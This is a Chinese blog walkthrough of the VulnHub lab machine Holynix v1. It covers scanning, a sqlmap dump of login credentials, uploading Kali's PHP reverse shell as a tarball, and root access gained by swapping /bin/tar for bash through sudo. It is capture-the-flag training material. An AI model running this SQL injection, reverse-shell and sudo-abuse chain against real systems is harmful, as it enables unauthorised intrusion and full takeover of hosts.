vulnhub靶机:Holynix: v1

最新推荐文章于 2024-10-12 17:33:23 发布
最新推荐文章于 2024-10-12 17:33:23 发布
阅读量620 收藏 8
点赞数 3
分类专栏: Vulnhub靶机 文章标签: 安全 web安全 网络安全 经验分享 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/142235294
版权

下载

下载地址:https://www.vulnhub.com/entry/holynix-v1,20/

打开虚拟机

选择下载解压之后的文件打开

新添加一张 NAT 网卡,mac 地址修改如下

00:0c:29:bc:05:de

给原来的桥接网卡,随机生成一个 mac 地址

然后重启虚拟机

信息收集

主机发现

arp-scan -l

端口扫描

nmap -p- 192.168。109.139

目录扫描

python3 dirsearch.py -u "192.168.109.172" -i 200

访问 web

进入 login 登录页面

点登录抓包,把数据包放到 1.txt 里用 sqlmap 进行测试

SQL注入

python3 sqlmap.py -r "D:\desktop\1.txt" --batch --dump

发现了用户和密码的表

账号:hreiser
密码:Ik1Ll3dNiN@r315er

登录成功

文件上传

除了第一个用户都可以上传,利用 kali 自带的反弹shell 的 php 上传

locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .
vim php-reverse-shell.php
tar -czf shell.tar.gz php-reverse-shell.php

改成 kali(攻击机)的 IP 和监听端口

在 kali 的火狐浏览器上传 php 的压缩包,并勾选上自动解压(本机的火狐上传之后解压不成功)

开启监听

访问 kali 上的 url/~etenenbaum/ 页面,发现了上传的文件.

双击 php ,监听成功

sudo 提权

sudo -l 查看允许用户使用的命令

sudo -l

切换到/tmp目录下,将 /bin/bash 文件复制到 /tmp 目录下

cd /tmp
cp /bin/bash .

更改文件 /tmp/bash 的所有权,将所有者改为 root

sudo chown root:root/tmp/bash

将现有的 /bin/tar 文件备份到 bin/tar.bak 中

将 /tmp/bash 文件移动到 /bin/tar

执行 /bin/tar 命令,成功提权

sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar
sudo /bin/tar

燕雀安知鸿鹄之志哉.
关注
专栏目录
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4277
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机HOLYNIX_ V1
LainWith的博客
12-23 2380
Holynix(此系列共2台)发布日期:2010年11月27日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:需要手工设置靶机的MAC为00:0c:29:bc:05:de,然后重启靶机才能获取到靶机IP主机发现端口扫描+漏洞扫描万能密码文件包含漏洞mv提权。
Vulnhub靶机Holynix: v1
whoami
09-13 785
Vulnhub靶机Holynix: v1实战
VulnHub:holynix:v1
wbplife的博客
07-12 507
注意:下载成功后用vmware打开,跳出提示框请选择“我已移动该虚拟机”,然后设置为NAT模式,否则无法扫描到靶机
vulnhub系列:holynix-v1靶机
jq_j37的博客
07-29 281
holynix-v1靶机,打靶
vulnhub靶场/holynix
qq_45230030的博客
04-16 1071
分享一下之前vulnhub的打靶记录
红队打靶:holynix打靶思路详解(vulnhub
Bossfrank的博客
07-02 1726
本文是vulnhub靶机holynix的详细打靶过程。涉及的知识点包括SQL注入、POST型文件包含漏洞利用、越权漏洞、sudo权限利用提权等。发现POST型文件包含漏洞的参数是关键上,传合适的shell也需要一定技巧。
HOLYNIX: V1
Mysmycbx的博客
03-18 355
holynix
Holynix: v1 靶机-详细流程
m0_73983897的博客
09-14 669
流程:主机发现 - 端口扫描 - web渗透 - 获取shell - 权限提升; web渗透:在web渗透中看到参数=文件或?文件时,就要想到任意文件读取等文件相关的漏洞;SQLMap注入时 ,我经常使用的是 -r 和 -p 参数,没想到在这次的注入中居然失灵了,一度以为无法使用SQLMap,没想到 --data 反而立了大功,这倒是提醒我要经常换着使用参数;Cookie的修改越权,近期见的确实不少,以后要将查看Cookie的优先度,往前提一提了;
Holynix-v1打靶渗透(权限提升)
weixin_52487093的博客
07-30 436
【代码】Holynix-v1打靶渗透(权限提升)
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1970
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
域1:安全与风险管理 第2章-人员安全与风险管理
rm -rf /*
10-12 918
风险管理过程包括识别可能造成数据损坏或泄漏的因素,根据数据价值和控制措施的成本评估这些因素,并实施具有成本效益的解决方案来减轻或者降低风险。通过执行风险管理,为全面降低风险奠定基础。
如何选择安全的谷歌浏览器插件
最新发布
2403_86768603的博客
10-12 520
在数字时代,浏览器插件为我们提供了极大的便利,增强了我们的浏览体验。然而,随着便利性的增加,安全性问题也日益凸显。以下是详细的教程,帮助你选择和使用安全的谷歌浏览器插件。在安装任何插件之前,查看其开发者信息,包括开发者的名称、网站以及其他用户的评价。一个仅仅提供网页高亮功能的插件请求访问你的联系人列表显然是不合理的。记住,保护个人信息的安全是一场持久战,需要我们持续的关注和努力。最后,安装可靠的安全软件可以帮助防止恶意软件和病毒的入侵。确保这些密码的安全性,避免使用简单或重复的密码。
企业内部文档安全外发如何挑选合适的外发系统?
镭速的博客
10-12 601
镭速技术已成功帮助多家企业实现文档安全外发管理,如在B2B模式下,通过镭速技术,企业可以构建一个安全、高效、可控的文档外发管理体系,从而在激烈的市场竞争中占据优势。然而,如何在保证信息安全的同时实现高效、便捷的文档外发,成为了一个不小的挑战。:镭速技术已成功帮助多家企业实现文档安全外发管理,如在B2B模式下,通过镭速技术,企业可以构建一个安全、高效、可控的文档外发管理体系,从而在激烈的市场竞争中占据优势。:通过多层次的安全机制,如数据传输全程加密、审批流程、传输日志记录等,确保文档在传输过程中的安全性。
华为免费杀毒软件 | HiSec Endpoint 智能终端安全系统
dntkorg的博客
10-09 382
HiSec Endpoint智能终端安全系统是由华为开发的一款全面的终端安全防护产品。该系统的核心目的是保护终端资产的安全,防止各种网络威胁。能够实时感知终端异常行为,多维检测识别潜在安全威胁,自动处置威胁事件,智能溯源入侵路径,并提供一键勒索加密文件回滚功能,帮助用户保护核心终端资产安全。经权威三方机构检测,已知勒索检出率达到100%,有效抵御勒索威胁。
【10086网上营业厅-注册/登录安全分析报告】
10-09 936
中国移动通信集团公司(简称“中国移动”)于2000年4月20日成立,注册资本为518亿元人民币,资产规模超过7000亿元,是2008年北京奥运会合作伙伴。中国移动网上营业厅,是中国移动通信提供给客户进行业务受理、营销推广、信息查询的网上自助平台。作为运营商中的龙头企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
DW-大模型生图安全疫苗注入作业记录
Loss
10-10 300
创建实例后与你运行代码,git clone model 太慢了。再跑相关程序,提交csv结果即可。模型下载慢问题 解决办法。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值